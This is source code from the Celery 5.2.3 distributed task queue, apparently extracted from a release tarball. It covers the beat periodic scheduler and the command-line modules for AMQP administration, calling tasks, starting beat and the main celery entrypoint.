entry = self.reserve(entry) if advance else entry task = self.app.tasks.get(entry.task) try: entry_args = _evaluate_entry_args(entry.args) entry_kwargs = _evaluate_entry_kwargs(entry.kwargs) if task: return task.apply_async(entry_args, entry_kwargs, producer=producer, **entry.options) else: return self.send_task(entry.task, entry_args, entry_kwargs, producer=producer, **entry.options) except Exception as exc: # pylint: disable=broad-except reraise(SchedulingError, SchedulingError( "Couldn't apply scheduled task {0.name}: {exc}".format( entry, exc=exc)), sys.exc_info()[2]) finally: self._tasks_since_sync += 1 if self.should_sync(): self._do_sync() def send_task(self, *args, **kwargs): return self.app.send_task(*args, **kwargs) def setup_schedule(self): self.install_default_entries(self.data) self.merge_inplace(self.app.conf.beat_schedule) def _do_sync(self): try: debug('beat: Synchronizing schedule...') self.sync() finally: self._last_sync = time.monotonic() self._tasks_since_sync = 0 def sync(self): pass def close(self): self.sync() def add(self, **kwargs): entry = self.Entry(app=self.app, **kwargs) self.schedule[entry.name] = entry return entry def _maybe_entry(self, name, entry): if isinstance(entry, self.Entry): entry.app = self.app return entry return self.Entry(**dict(entry, name=name, app=self.app)) def update_from_dict(self, dict_): self.schedule.update({ name: self._maybe_entry(name, entry) for name, entry in dict_.items() }) def merge_inplace(self, b): schedule = self.schedule A, B = set(schedule), set(b) # Remove items from disk not in the schedule anymore. for key in A ^ B: schedule.pop(key, None) # Update and add new items in the schedule for key in B: entry = self.Entry(**dict(b[key], name=key, app=self.app)) if schedule.get(key): schedule[key].update(entry) else: schedule[key] = entry def _ensure_connected(self): # callback called for each retry while the connection # can't be established. def _error_handler(exc, interval): error('beat: Connection error: %s. ' 'Trying again in %s seconds...', exc, interval) return self.connection.ensure_connection( _error_handler, self.app.conf.broker_connection_max_retries ) def get_schedule(self): return self.data def set_schedule(self, schedule): self.data = schedule schedule = property(get_schedule, set_schedule) @cached_property def connection(self): return self.app.connection_for_write() @cached_property def producer(self): return self.Producer(self._ensure_connected(), auto_declare=False) @property def info(self): return '' class PersistentScheduler(Scheduler): """Scheduler backed by :mod:`shelve` database.""" persistence = shelve known_suffixes = ('', '.db', '.dat', '.bak', '.dir') _store = None def __init__(self, *args, **kwargs): self.schedule_filename = kwargs.get('schedule_filename') super().__init__(*args, **kwargs) def _remove_db(self): for suffix in self.known_suffixes: with platforms.ignore_errno(errno.ENOENT): os.remove(self.schedule_filename + suffix) def _open_schedule(self): return self.persistence.open(self.schedule_filename, writeback=True) def _destroy_open_corrupted_schedule(self, exc): error('Removing corrupted schedule file %r: %r', self.schedule_filename, exc, exc_info=True) self._remove_db() return self._open_schedule() def setup_schedule(self): try: self._store = self._open_schedule() # In some cases there may be different errors from a storage # backend for corrupted files. Example - DBPageNotFoundError # exception from bsddb. 
In such case the file will be # successfully opened but the error will be raised on first key # retrieving. self._store.keys() except Exception as exc: # pylint: disable=broad-except self._store = self._destroy_open_corrupted_schedule(exc) self._create_schedule() tz = self.app.conf.timezone stored_tz = self._store.get('tz') if stored_tz is not None and stored_tz != tz: warning('Reset: Timezone changed from %r to %r', stored_tz, tz) self._store.clear() # Timezone changed, reset db! utc = self.app.conf.enable_utc stored_utc = self._store.get('utc_enabled') if stored_utc is not None and stored_utc != utc: choices = {True: 'enabled', False: 'disabled'} warning('Reset: UTC changed from %s to %s', choices[stored_utc], choices[utc]) self._store.clear() # UTC setting changed, reset db! entries = self._store.setdefault('entries', {}) self.merge_inplace(self.app.conf.beat_schedule) self.install_default_entries(self.schedule) self._store.update({ '__version__': __version__, 'tz': tz, 'utc_enabled': utc, }) self.sync() debug('Current schedule:\n' + '\n'.join( repr(entry) for entry in entries.values())) def _create_schedule(self): for _ in (1, 2): try: self._store['entries'] except KeyError: # new schedule db try: self._store['entries'] = {} except KeyError as exc: self._store = self._destroy_open_corrupted_schedule(exc) continue else: if '__version__' not in self._store: warning('DB Reset: Account for new __version__ field') self._store.clear() # remove schedule at 2.2.2 upgrade. elif 'tz' not in self._store: warning('DB Reset: Account for new tz field') self._store.clear() # remove schedule at 3.0.8 upgrade elif 'utc_enabled' not in self._store: warning('DB Reset: Account for new utc_enabled field') self._store.clear() # remove schedule at 3.0.9 upgrade break def get_schedule(self): return self._store['entries'] def set_schedule(self, schedule): self._store['entries'] = schedule schedule = property(get_schedule, set_schedule) def sync(self): if self._store is not None: self._store.sync() def close(self): self.sync() self._store.close() @property def info(self): return f' . 
db -> {self.schedule_filename}' class Service: """Celery periodic task service.""" scheduler_cls = PersistentScheduler def __init__(self, app, max_interval=None, schedule_filename=None, scheduler_cls=None): self.app = app self.max_interval = (max_interval or app.conf.beat_max_loop_interval) self.scheduler_cls = scheduler_cls or self.scheduler_cls self.schedule_filename = ( schedule_filename or app.conf.beat_schedule_filename) self._is_shutdown = Event() self._is_stopped = Event() def __reduce__(self): return self.__class__, (self.max_interval, self.schedule_filename, self.scheduler_cls, self.app) def start(self, embedded_process=False): info('beat: Starting...') debug('beat: Ticking with max interval->%s', humanize_seconds(self.scheduler.max_interval)) signals.beat_init.send(sender=self) if embedded_process: signals.beat_embedded_init.send(sender=self) platforms.set_process_title('celery beat') try: while not self._is_shutdown.is_set(): interval = self.scheduler.tick() if interval and interval > 0.0: debug('beat: Waking up %s.', humanize_seconds(interval, prefix='in ')) time.sleep(interval) if self.scheduler.should_sync(): self.scheduler._do_sync() except (KeyboardInterrupt, SystemExit): self._is_shutdown.set() finally: self.sync() def sync(self): self.scheduler.close() self._is_stopped.set() def stop(self, wait=False): info('beat: Shutting down...') self._is_shutdown.set() wait and self._is_stopped.wait() # block until shutdown done. def get_scheduler(self, lazy=False, extension_namespace='celery.beat_schedulers'): filename = self.schedule_filename aliases = dict( load_extension_class_names(extension_namespace) or {}) return symbol_by_name(self.scheduler_cls, aliases=aliases)( app=self.app, schedule_filename=filename, max_interval=self.max_interval, lazy=lazy, ) @cached_property def scheduler(self): return self.get_scheduler() class _Threaded(Thread): """Embedded task scheduler using threading.""" def __init__(self, app, **kwargs): super().__init__() self.app = app self.service = Service(app, **kwargs) self.daemon = True self.name = 'Beat' def run(self): self.app.set_current() self.service.start() def stop(self): self.service.stop(wait=True) try: ensure_multiprocessing() except NotImplementedError: # pragma: no cover _Process = None else: class _Process(Process): def __init__(self, app, **kwargs): super().__init__() self.app = app self.service = Service(app, **kwargs) self.name = 'Beat' def run(self): reset_signals(full=False) platforms.close_open_fds([ sys.__stdin__, sys.__stdout__, sys.__stderr__, ] + list(iter_open_logger_fds())) self.app.set_default() self.app.set_current() self.service.start(embedded_process=True) def stop(self): self.service.stop() self.terminate() def EmbeddedService(app, max_interval=None, **kwargs): """Return embedded clock service. Arguments: thread (bool): Run threaded instead of as a separate process. Uses :mod:`multiprocessing` by default, if available. """ if kwargs.pop('thread', False) or _Process is None: # Need short max interval to be able to stop thread # in reasonable time. 
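# Rough usage sketch for the ``EmbeddedService`` helper defined here: running beat in a
# daemon thread alongside other work.  The app and broker URL are placeholders, and the
# default PersistentScheduler will still create its usual ``celerybeat-schedule`` file in
# the working directory.
from celery import Celery
from celery.beat import EmbeddedService

app = Celery('proj', broker='memory://')
service = EmbeddedService(app, thread=True)   # returns the threaded wrapper
service.start()
# ... run the rest of the program ...
service.stop()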
return _Threaded(app, max_interval=1, **kwargs) return _Process(app, max_interval=max_interval, **kwargs) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4237502 celery-5.2.3/celery/bin/0000775000175000017500000000000000000000000014730 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/__init__.py0000664000175000017500000000000000000000000017027 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/amqp.py0000664000175000017500000002345600000000000016252 0ustar00asifasif00000000000000"""AMQP 0.9.1 REPL.""" import pprint import click from amqp import Connection, Message from click_repl import register_repl __all__ = ('amqp',) from celery.bin.base import handle_preload_options def dump_message(message): if message is None: return 'No messages in queue. basic.publish something.' return {'body': message.body, 'properties': message.properties, 'delivery_info': message.delivery_info} class AMQPContext: def __init__(self, cli_context): self.cli_context = cli_context self.connection = self.cli_context.app.connection() self.channel = None self.reconnect() @property def app(self): return self.cli_context.app def respond(self, retval): if isinstance(retval, str): self.cli_context.echo(retval) else: self.cli_context.echo(pprint.pformat(retval)) def echo_error(self, exception): self.cli_context.error(f'{self.cli_context.ERROR}: {exception}') def echo_ok(self): self.cli_context.echo(self.cli_context.OK) def reconnect(self): if self.connection: self.connection.close() else: self.connection = self.cli_context.app.connection() self.cli_context.echo(f'-> connecting to {self.connection.as_uri()}.') try: self.connection.connect() except (ConnectionRefusedError, ConnectionResetError) as e: self.echo_error(e) else: self.cli_context.secho('-> connected.', fg='green', bold=True) self.channel = self.connection.default_channel @click.group(invoke_without_command=True) @click.pass_context @handle_preload_options def amqp(ctx): """AMQP Administration Shell. Also works for non-AMQP transports (but not ones that store declarations in memory). """ if not isinstance(ctx.obj, AMQPContext): ctx.obj = AMQPContext(ctx.obj) @amqp.command(name='exchange.declare') @click.argument('exchange', type=str) @click.argument('type', type=str) @click.argument('passive', type=bool, default=False) @click.argument('durable', type=bool, default=False) @click.argument('auto_delete', type=bool, default=False) @click.pass_obj def exchange_declare(amqp_context, exchange, type, passive, durable, auto_delete): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.exchange_declare(exchange=exchange, type=type, passive=passive, durable=durable, auto_delete=auto_delete) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='exchange.delete') @click.argument('exchange', type=str) @click.argument('if_unused', type=bool) @click.pass_obj def exchange_delete(amqp_context, exchange, if_unused): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. 
Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.exchange_delete(exchange=exchange, if_unused=if_unused) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='queue.bind') @click.argument('queue', type=str) @click.argument('exchange', type=str) @click.argument('routing_key', type=str) @click.pass_obj def queue_bind(amqp_context, queue, exchange, routing_key): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.queue_bind(queue=queue, exchange=exchange, routing_key=routing_key) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='queue.declare') @click.argument('queue', type=str) @click.argument('passive', type=bool, default=False) @click.argument('durable', type=bool, default=False) @click.argument('auto_delete', type=bool, default=False) @click.pass_obj def queue_declare(amqp_context, queue, passive, durable, auto_delete): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: retval = amqp_context.channel.queue_declare(queue=queue, passive=passive, durable=durable, auto_delete=auto_delete) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.cli_context.secho( 'queue:{} messages:{} consumers:{}'.format(*retval), fg='cyan', bold=True) amqp_context.echo_ok() @amqp.command(name='queue.delete') @click.argument('queue', type=str) @click.argument('if_unused', type=bool, default=False) @click.argument('if_empty', type=bool, default=False) @click.pass_obj def queue_delete(amqp_context, queue, if_unused, if_empty): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: retval = amqp_context.channel.queue_delete(queue=queue, if_unused=if_unused, if_empty=if_empty) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.cli_context.secho( f'{retval} messages deleted.', fg='cyan', bold=True) amqp_context.echo_ok() @amqp.command(name='queue.purge') @click.argument('queue', type=str) @click.pass_obj def queue_purge(amqp_context, queue): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: retval = amqp_context.channel.queue_purge(queue=queue) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.cli_context.secho( f'{retval} messages deleted.', fg='cyan', bold=True) amqp_context.echo_ok() @amqp.command(name='basic.get') @click.argument('queue', type=str) @click.argument('no_ack', type=bool, default=False) @click.pass_obj def basic_get(amqp_context, queue, no_ack): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. 
Please retry...') amqp_context.reconnect() else: try: message = amqp_context.channel.basic_get(queue, no_ack=no_ack) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.respond(dump_message(message)) amqp_context.echo_ok() @amqp.command(name='basic.publish') @click.argument('msg', type=str) @click.argument('exchange', type=str) @click.argument('routing_key', type=str) @click.argument('mandatory', type=bool, default=False) @click.argument('immediate', type=bool, default=False) @click.pass_obj def basic_publish(amqp_context, msg, exchange, routing_key, mandatory, immediate): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: # XXX Hack to fix Issue #2013 if isinstance(amqp_context.connection.connection, Connection): msg = Message(msg) try: amqp_context.channel.basic_publish(msg, exchange=exchange, routing_key=routing_key, mandatory=mandatory, immediate=immediate) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() @amqp.command(name='basic.ack') @click.argument('delivery_tag', type=int) @click.pass_obj def basic_ack(amqp_context, delivery_tag): if amqp_context.channel is None: amqp_context.echo_error('Not connected to broker. Please retry...') amqp_context.reconnect() else: try: amqp_context.channel.basic_ack(delivery_tag) except Exception as e: amqp_context.echo_error(e) amqp_context.reconnect() else: amqp_context.echo_ok() repl = register_repl(amqp) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/base.py0000664000175000017500000002053700000000000016223 0ustar00asifasif00000000000000"""Click customizations for Celery.""" import json import numbers from collections import OrderedDict from functools import update_wrapper from pprint import pformat import click from click import ParamType from kombu.utils.objects import cached_property from celery._state import get_current_app from celery.signals import user_preload_options from celery.utils import text from celery.utils.log import mlevel from celery.utils.time import maybe_iso8601 try: from pygments import highlight from pygments.formatters import Terminal256Formatter from pygments.lexers import PythonLexer except ImportError: def highlight(s, *args, **kwargs): """Place holder function in case pygments is missing.""" return s LEXER = None FORMATTER = None else: LEXER = PythonLexer() FORMATTER = Terminal256Formatter() class CLIContext: """Context Object for the CLI.""" def __init__(self, app, no_color, workdir, quiet=False): """Initialize the CLI context.""" self.app = app or get_current_app() self.no_color = no_color self.quiet = quiet self.workdir = workdir @cached_property def OK(self): return self.style("OK", fg="green", bold=True) @cached_property def ERROR(self): return self.style("ERROR", fg="red", bold=True) def style(self, message=None, **kwargs): if self.no_color: return message else: return click.style(message, **kwargs) def secho(self, message=None, **kwargs): if self.no_color: kwargs['color'] = False click.echo(message, **kwargs) else: click.secho(message, **kwargs) def echo(self, message=None, **kwargs): if self.no_color: kwargs['color'] = False click.echo(message, **kwargs) else: click.echo(message, **kwargs) def error(self, message=None, **kwargs): kwargs['err'] = True if self.no_color: kwargs['color'] = False click.echo(message, **kwargs) else: click.secho(message, 
**kwargs) def pretty(self, n): if isinstance(n, list): return self.OK, self.pretty_list(n) if isinstance(n, dict): if 'ok' in n or 'error' in n: return self.pretty_dict_ok_error(n) else: s = json.dumps(n, sort_keys=True, indent=4) if not self.no_color: s = highlight(s, LEXER, FORMATTER) return self.OK, s if isinstance(n, str): return self.OK, n return self.OK, pformat(n) def pretty_list(self, n): if not n: return '- empty -' return '\n'.join( f'{self.style("*", fg="white")} {item}' for item in n ) def pretty_dict_ok_error(self, n): try: return (self.OK, text.indent(self.pretty(n['ok'])[1], 4)) except KeyError: pass return (self.ERROR, text.indent(self.pretty(n['error'])[1], 4)) def say_chat(self, direction, title, body='', show_body=False): if direction == '<-' and self.quiet: return dirstr = not self.quiet and f'{self.style(direction, fg="white", bold=True)} ' or '' self.echo(f'{dirstr} {title}') if body and show_body: self.echo(body) def handle_preload_options(f): """Extract preload options and return a wrapped callable.""" def caller(ctx, *args, **kwargs): app = ctx.obj.app preload_options = [o.name for o in app.user_options.get('preload', [])] if preload_options: user_options = { preload_option: kwargs[preload_option] for preload_option in preload_options } user_preload_options.send(sender=f, app=app, options=user_options) return f(ctx, *args, **kwargs) return update_wrapper(caller, f) class CeleryOption(click.Option): """Customized option for Celery.""" def get_default(self, ctx, *args, **kwargs): if self.default_value_from_context: self.default = ctx.obj[self.default_value_from_context] return super().get_default(ctx, *args, **kwargs) def __init__(self, *args, **kwargs): """Initialize a Celery option.""" self.help_group = kwargs.pop('help_group', None) self.default_value_from_context = kwargs.pop('default_value_from_context', None) super().__init__(*args, **kwargs) class CeleryCommand(click.Command): """Customized command for Celery.""" def format_options(self, ctx, formatter): """Write all the options into the formatter if they exist.""" opts = OrderedDict() for param in self.get_params(ctx): rv = param.get_help_record(ctx) if rv is not None: if hasattr(param, 'help_group') and param.help_group: opts.setdefault(str(param.help_group), []).append(rv) else: opts.setdefault('Options', []).append(rv) for name, opts_group in opts.items(): with formatter.section(name): formatter.write_dl(opts_group) class CeleryDaemonCommand(CeleryCommand): """Daemon commands.""" def __init__(self, *args, **kwargs): """Initialize a Celery command with common daemon options.""" super().__init__(*args, **kwargs) self.params.append(CeleryOption(('-f', '--logfile'), help_group="Daemonization Options")) self.params.append(CeleryOption(('--pidfile',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--uid',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--gid',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--umask',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--executable',), help_group="Daemonization Options")) class CommaSeparatedList(ParamType): """Comma separated list argument.""" name = "comma separated list" def convert(self, value, param, ctx): return text.str_to_list(value) class JsonArray(ParamType): """JSON formatted array argument.""" name = "json array" def convert(self, value, param, ctx): if isinstance(value, list): 
return value try: v = json.loads(value) except ValueError as e: self.fail(str(e)) if not isinstance(v, list): self.fail(f"{value} was not an array") return v class JsonObject(ParamType): """JSON formatted object argument.""" name = "json object" def convert(self, value, param, ctx): if isinstance(value, dict): return value try: v = json.loads(value) except ValueError as e: self.fail(str(e)) if not isinstance(v, dict): self.fail(f"{value} was not an object") return v class ISO8601DateTime(ParamType): """ISO 8601 Date Time argument.""" name = "iso-86091" def convert(self, value, param, ctx): try: return maybe_iso8601(value) except (TypeError, ValueError) as e: self.fail(e) class ISO8601DateTimeOrFloat(ParamType): """ISO 8601 Date Time or float argument.""" name = "iso-86091 or float" def convert(self, value, param, ctx): try: return float(value) except (TypeError, ValueError): pass try: return maybe_iso8601(value) except (TypeError, ValueError) as e: self.fail(e) class LogLevel(click.Choice): """Log level option.""" def __init__(self): """Initialize the log level option with the relevant choices.""" super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL')) def convert(self, value, param, ctx): if isinstance(value, numbers.Integral): return value value = value.upper() value = super().convert(value, param, ctx) return mlevel(value) JSON_ARRAY = JsonArray() JSON_OBJECT = JsonObject() ISO8601 = ISO8601DateTime() ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat() LOG_LEVEL = LogLevel() COMMA_SEPARATED_LIST = CommaSeparatedList() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/beat.py0000664000175000017500000000502700000000000016221 0ustar00asifasif00000000000000"""The :program:`celery beat` command.""" from functools import partial import click from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options) from celery.platforms import detached, maybe_drop_privileges @click.command(cls=CeleryDaemonCommand, context_settings={ 'allow_extra_args': True }) @click.option('--detach', cls=CeleryOption, is_flag=True, default=False, help_group="Beat Options", help="Detach and run in the background as a daemon.") @click.option('-s', '--schedule', cls=CeleryOption, callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename, help_group="Beat Options", help="Path to the schedule database." " Defaults to `celerybeat-schedule`." 
"The extension '.db' may be appended to the filename.") @click.option('-S', '--scheduler', cls=CeleryOption, callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_scheduler, help_group="Beat Options", help="Scheduler class to use.") @click.option('--max-interval', cls=CeleryOption, type=int, help_group="Beat Options", help="Max seconds to sleep between schedule iterations.") @click.option('-l', '--loglevel', default='WARNING', cls=CeleryOption, type=LOG_LEVEL, help_group="Beat Options", help="Logging level.") @click.pass_context @handle_preload_options def beat(ctx, detach=False, logfile=None, pidfile=None, uid=None, gid=None, umask=None, workdir=None, **kwargs): """Start the beat periodic task scheduler.""" app = ctx.obj.app if ctx.args: try: app.config_from_cmdline(ctx.args) except (KeyError, ValueError) as e: # TODO: Improve the error messages raise click.UsageError("Unable to parse extra configuration" " from command line.\n" f"Reason: {e}", ctx=ctx) if not detach: maybe_drop_privileges(uid=uid, gid=gid) beat = partial(app.Beat, logfile=logfile, pidfile=pidfile, **kwargs) if detach: with detached(logfile, pidfile, uid, gid, umask, workdir): return beat().run() else: return beat().run() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/call.py0000664000175000017500000000453700000000000016226 0ustar00asifasif00000000000000"""The ``celery call`` program used to send tasks from the command-line.""" import click from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY, JSON_OBJECT, CeleryCommand, CeleryOption, handle_preload_options) @click.command(cls=CeleryCommand) @click.argument('name') @click.option('-a', '--args', cls=CeleryOption, type=JSON_ARRAY, default='[]', help_group="Calling Options", help="Positional arguments.") @click.option('-k', '--kwargs', cls=CeleryOption, type=JSON_OBJECT, default='{}', help_group="Calling Options", help="Keyword arguments.") @click.option('--eta', cls=CeleryOption, type=ISO8601, help_group="Calling Options", help="scheduled time.") @click.option('--countdown', cls=CeleryOption, type=float, help_group="Calling Options", help="eta in seconds from now.") @click.option('--expires', cls=CeleryOption, type=ISO8601_OR_FLOAT, help_group="Calling Options", help="expiry time.") @click.option('--serializer', cls=CeleryOption, default='json', help_group="Calling Options", help="task serializer.") @click.option('--queue', cls=CeleryOption, help_group="Routing Options", help="custom queue name.") @click.option('--exchange', cls=CeleryOption, help_group="Routing Options", help="custom exchange name.") @click.option('--routing-key', cls=CeleryOption, help_group="Routing Options", help="custom routing key.") @click.pass_context @handle_preload_options def call(ctx, name, args, kwargs, eta, countdown, expires, serializer, queue, exchange, routing_key): """Call a task by name.""" task_id = ctx.obj.app.send_task( name, args=args, kwargs=kwargs, countdown=countdown, serializer=serializer, queue=queue, exchange=exchange, routing_key=routing_key, eta=eta, expires=expires ).id ctx.obj.echo(task_id) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/celery.py0000664000175000017500000001503400000000000016570 0ustar00asifasif00000000000000"""Celery Command Line Interface.""" import os import pathlib import traceback import click import click.exceptions from click.types import ParamType from 
click_didyoumean import DYMGroup from click_plugins import with_plugins from pkg_resources import iter_entry_points from celery import VERSION_BANNER from celery.app.utils import find_app from celery.bin.amqp import amqp from celery.bin.base import CeleryCommand, CeleryOption, CLIContext from celery.bin.beat import beat from celery.bin.call import call from celery.bin.control import control, inspect, status from celery.bin.events import events from celery.bin.graph import graph from celery.bin.list import list_ from celery.bin.logtool import logtool from celery.bin.migrate import migrate from celery.bin.multi import multi from celery.bin.purge import purge from celery.bin.result import result from celery.bin.shell import shell from celery.bin.upgrade import upgrade from celery.bin.worker import worker UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND = click.style(""" Unable to load celery application. The module {0} was not found.""", fg='red') UNABLE_TO_LOAD_APP_ERROR_OCCURRED = click.style(""" Unable to load celery application. While trying to load the module {0} the following error occurred: {1}""", fg='red') UNABLE_TO_LOAD_APP_APP_MISSING = click.style(""" Unable to load celery application. {0}""") class App(ParamType): """Application option.""" name = "application" def convert(self, value, param, ctx): try: return find_app(value) except ModuleNotFoundError as e: if e.name != value: exc = traceback.format_exc() self.fail( UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) ) self.fail(UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND.format(e.name)) except AttributeError as e: attribute_name = e.args[0].capitalize() self.fail(UNABLE_TO_LOAD_APP_APP_MISSING.format(attribute_name)) except Exception: exc = traceback.format_exc() self.fail( UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) ) APP = App() @with_plugins(iter_entry_points('celery.commands')) @click.group(cls=DYMGroup, invoke_without_command=True) @click.option('-A', '--app', envvar='APP', cls=CeleryOption, type=APP, help_group="Global Options") @click.option('-b', '--broker', envvar='BROKER_URL', cls=CeleryOption, help_group="Global Options") @click.option('--result-backend', envvar='RESULT_BACKEND', cls=CeleryOption, help_group="Global Options") @click.option('--loader', envvar='LOADER', cls=CeleryOption, help_group="Global Options") @click.option('--config', envvar='CONFIG_MODULE', cls=CeleryOption, help_group="Global Options") @click.option('--workdir', cls=CeleryOption, type=pathlib.Path, callback=lambda _, __, wd: os.chdir(wd) if wd else None, is_eager=True, help_group="Global Options") @click.option('-C', '--no-color', envvar='NO_COLOR', is_flag=True, cls=CeleryOption, help_group="Global Options") @click.option('-q', '--quiet', is_flag=True, cls=CeleryOption, help_group="Global Options") @click.option('--version', cls=CeleryOption, is_flag=True, help_group="Global Options") @click.pass_context def celery(ctx, app, broker, result_backend, loader, config, workdir, no_color, quiet, version): """Celery command entrypoint.""" if version: click.echo(VERSION_BANNER) ctx.exit() elif ctx.invoked_subcommand is None: click.echo(ctx.get_help()) ctx.exit() if loader: # Default app takes loader from this env (Issue #1066). 
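# The assignments below export the global CLI options as environment
# variables so that the lazily-configured app picks them up later.
# Illustrative only (``proj`` is a hypothetical app module): an invocation
# such as
#     celery -A proj -b amqp://guest@localhost// --result-backend rpc:// worker
# is roughly equivalent to exporting CELERY_BROKER_URL and
# CELERY_RESULT_BACKEND before starting the worker.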
os.environ['CELERY_LOADER'] = loader if broker: os.environ['CELERY_BROKER_URL'] = broker if result_backend: os.environ['CELERY_RESULT_BACKEND'] = result_backend if config: os.environ['CELERY_CONFIG_MODULE'] = config ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir, quiet=quiet) # User options worker.params.extend(ctx.obj.app.user_options.get('worker', [])) beat.params.extend(ctx.obj.app.user_options.get('beat', [])) events.params.extend(ctx.obj.app.user_options.get('events', [])) for command in celery.commands.values(): command.params.extend(ctx.obj.app.user_options.get('preload', [])) @celery.command(cls=CeleryCommand) @click.pass_context def report(ctx): """Shows information useful to include in bug-reports.""" app = ctx.obj.app app.loader.import_default_modules() ctx.obj.echo(app.bugreport()) celery.add_command(purge) celery.add_command(call) celery.add_command(beat) celery.add_command(list_) celery.add_command(result) celery.add_command(migrate) celery.add_command(status) celery.add_command(worker) celery.add_command(events) celery.add_command(inspect) celery.add_command(control) celery.add_command(graph) celery.add_command(upgrade) celery.add_command(logtool) celery.add_command(amqp) celery.add_command(shell) celery.add_command(multi) # Monkey-patch click to display a custom error # when -A or --app are used as sub-command options instead of as options # of the global command. previous_show_implementation = click.exceptions.NoSuchOption.show WRONG_APP_OPTION_USAGE_MESSAGE = """You are using `{option_name}` as an option of the {info_name} sub-command: celery {info_name} {option_name} celeryapp <...> The support for this usage was removed in Celery 5.0. Instead you should use `{option_name}` as a global option: celery {option_name} celeryapp {info_name} <...>""" def _show(self, file=None): if self.option_name in ('-A', '--app'): self.ctx.obj.error( WRONG_APP_OPTION_USAGE_MESSAGE.format( option_name=self.option_name, info_name=self.ctx.info_name), fg='red' ) previous_show_implementation(self, file=file) click.exceptions.NoSuchOption.show = _show def main() -> int: """Start celery umbrella command. This function is the main entrypoint for the CLI. :return: The exit code of the CLI. """ return celery(auto_envvar_prefix="CELERY") ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/control.py0000664000175000017500000001566100000000000016773 0ustar00asifasif00000000000000"""The ``celery control``, ``. inspect`` and ``. status`` programs.""" from functools import partial import click from kombu.utils.json import dumps from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options) from celery.exceptions import CeleryCommandException from celery.platforms import EX_UNAVAILABLE from celery.utils import text from celery.worker.control import Panel def _say_remote_command_reply(ctx, replies, show_reply=False): node = next(iter(replies)) # <-- take first. 
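# This helper formats a single reply mapping ({nodename: reply}) for terminal
# output, taking the first (and normally only) node in the mapping; it is the
# ``callback`` passed to inspect()/broadcast() below so replies are printed
# as they arrive. Illustrative only (exact styling depends on
# CLIContext.pretty): a ping reply such as {'celery@host1': {'ok': 'pong'}}
# is rendered roughly as "->  celery@host1: OK pong".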
reply = replies[node] node = ctx.obj.style(f'{node}: ', fg='cyan', bold=True) status, preply = ctx.obj.pretty(reply) ctx.obj.say_chat('->', f'{node}{status}', text.indent(preply, 4) if show_reply else '', show_body=show_reply) def _consume_arguments(meta, method, args): i = 0 try: for i, arg in enumerate(args): try: name, typ = meta.args[i] except IndexError: if meta.variadic: break raise click.UsageError( 'Command {!r} takes arguments: {}'.format( method, meta.signature)) else: yield name, typ(arg) if typ is not None else arg finally: args[:] = args[i:] def _compile_arguments(action, args): meta = Panel.meta[action] arguments = {} if meta.args: arguments.update({ k: v for k, v in _consume_arguments(meta, action, args) }) if meta.variadic: arguments.update({meta.variadic: args}) return arguments @click.command(cls=CeleryCommand) @click.option('-t', '--timeout', cls=CeleryOption, type=float, default=1.0, help_group='Remote Control Options', help='Timeout in seconds waiting for reply.') @click.option('-d', '--destination', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Remote Control Options', help='Comma separated list of destination node names.') @click.option('-j', '--json', cls=CeleryOption, is_flag=True, help_group='Remote Control Options', help='Use json as output format.') 